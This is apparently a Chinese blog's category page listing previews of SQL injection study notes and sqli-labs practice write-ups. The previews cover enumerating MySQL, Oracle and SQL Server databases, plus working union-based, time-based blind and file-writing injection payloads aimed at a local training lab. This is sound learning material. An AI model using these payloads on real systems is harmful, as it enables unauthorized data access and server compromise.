sql-injection
文章平均质量分 80
csu_vc
天行健,君子以自强不息
展开
-
SQL Injection(1)
在MySQL中,枚举数据库是有一定的顺序的,首先是提取数据库名称,然后是表、列,最后才是数据本身,遵循一种分级的方法。 通常最先想知道的是执行查询的用户名,可使用下列查询:SELECT user();SELECT current_user;如果想列出安装在远程MySQL上的数据库,可使用下列查询(假设拥有管理员权限):SELECT distinct(db) FROM mysql.db远程MySQ原创 2017-09-04 10:36:25 · 333 阅读 · 0 评论 -
SQL Injection(2)
那么,假如后台DBMS为Oracle时我们该如何枚举数据库模式呢? 使用Oracle时,我们需要注意:通常一次只能访问一个数据库(我们一般通过特定的链接来访问Oracle中的数据库)且应用访问多个数据库时通常使用不同的链接。因此,与SQL Server和MySQL不同,寻找数据库模式时Oracle无法枚举存在的数据库。0x01 查询当前用户表在应用环境下,它们通常是数据库中的应用表:select原创 2017-09-04 11:41:41 · 256 阅读 · 0 评论 -
SQL Injection(3)
0x01在SQL Server中,openrowset命令可以实现对远程OLE DB数据源的一次性链接。DBA可以用它来检索远程数据库上的数据,以此作为永久连接两个数据库的一种手段, 在使用openrowset前首先要启用Ad Hoc Distributed Queries服务,因为这个服务不安全所以SqlServer默认是关闭的启用Ad Hoc Distributed Queries的方法SQL原创 2017-09-04 14:36:35 · 362 阅读 · 0 评论 -
sqli-labs学习记录(四)
0x10 less-10http://localhost/sqli-labs-master/Less-10/?id=1" and sleep(5)-- + //判断后台闭合方式http://localhost/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',sleep(5),null)-- + /原创 2017-10-06 16:46:31 · 389 阅读 · 0 评论 -
sqli-labs学习记录(五)
0x15 less15 and less16第15和16课都是基于time and 布尔型post注入这两节课无论什么,都无法得到错误信息了,什么也没有,只能考虑延时首先盲测一下 可以利用if和sleep来获取信息,比如database(),@@datadir,user(),等等0x17 less-17使用updatexml 或者extractvalue都可以0x18 less-18http头注原创 2017-10-07 10:51:22 · 357 阅读 · 0 评论 -
sqli-labs学习记录(一)
0x01 less-1‘$id’ 单引号注入这里写代码片http://localhost/sqli-labs-master/Less-1/?id=14' order by 3-- + //猜字段http://localhost/sqli-labs-master/Less-1/?id=14' union select 1,2,3-- + //查看内容 发现服务器依旧只返回了第一条查询的信息,原创 2017-09-30 17:01:19 · 1025 阅读 · 0 评论 -
sqli-labs学习记录(二)
0x04 less-4在网上发现了另一种姿势避免limit的多次使用,就是用group_concat来一次性列出,在数据量比较少的时候很实用!后台查询语句$id = '"' . $id . '"';$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";payloadhttp://localhost/sqli-labs-master/Less-4/原创 2017-10-01 16:53:30 · 282 阅读 · 0 评论 -
sqli-labs学习记录(三)
0x07 less-7http://localhost/sqli-labs-master/Less-7/?id=1"-- +``` //首先要测试后台大概的查询语句http://localhost/sqli-labs-master/Less-7/?id=0')) union select * from users into outfile ‘路径’ //可以导出文件http://loc原创 2017-10-02 11:03:57 · 267 阅读 · 0 评论